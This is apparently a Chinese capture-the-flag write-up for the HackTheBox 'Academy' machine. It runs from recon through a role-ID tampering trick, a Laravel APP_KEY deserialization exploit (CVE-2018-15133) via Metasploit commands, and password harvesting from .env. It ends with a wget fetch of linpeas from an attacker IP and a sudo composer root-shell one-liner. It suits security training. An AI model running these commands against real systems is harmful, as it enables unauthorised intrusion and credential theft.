0x00 信息收集
ip:10.10.10.215
开放端口:80和22
22端口hydra爆破失败:
80端口被重定向到academy.htb,修改/etc/hosts,进入以下界面:
使用目录扫描工具对其扫描,看剧吃完紫菜包饭三个草莓喝了点热水后,得到结果如下:
0x01 漏洞利用
注册时抓包,将roleid的值从0改为1。
使用该账号访问/admin.php,可成功登录:
最后一行有域名:dev-staging-01.academy.htb
,将其也绑定到/etc/hosts上。得到页面如下:
对报错信息进行信息收集:
- mysql的登录口令:homestead:secret(经测试无效)
- APP_NAME “Laravel”
- APP_KEY “base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=”
Laravel框架存在漏洞(CVE-2018-15133),可利用信息泄露得到的APP_KEY获取WebShell。
利用脚本:戳我
或使用msf,参考官方漏洞文档:戳我
use exploit/unix/http/laravel_token_unserialize_exec
set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set rhost academy.htb
set lhost tun0
set vhost dev-staging-01.academy.htb
exploit
0x02 权限提升
python3 -c "import pty;pty.spawn('/bin/bash')"
cd ../../
cd academy
ls -a
在/var/www/html/academy/.env
文件夹中发现了数据库的密码(mySup3rP4s5w0rd!!)。
ls -a /home
可以发现六个用户名,其中cry0l1t3和mrb3n在主页有被提到。使用su命令切换到cry0l1t3,密码为mySup3rP4s5w0rd!!
找到正在系统上运行的所有SUID可执行文件。
find / -user root -perm -4000 -print 2>/dev/null
无已知的可利用方式,卒。
查阅资料,找一个有写入权限的文件夹,下载提权辅助脚本linpeas.sh。
cd /tmp
wget http://10.10.14.200:8000/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh
运行后,发现了mrb3n账户的登录口令(mrb3n_Ac@d3my!):
使用sudo -l
命令查看当前用户的特殊权限:
查阅文档:戳我 get到新的提权姿势:
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
flag在/root中的root.txt里。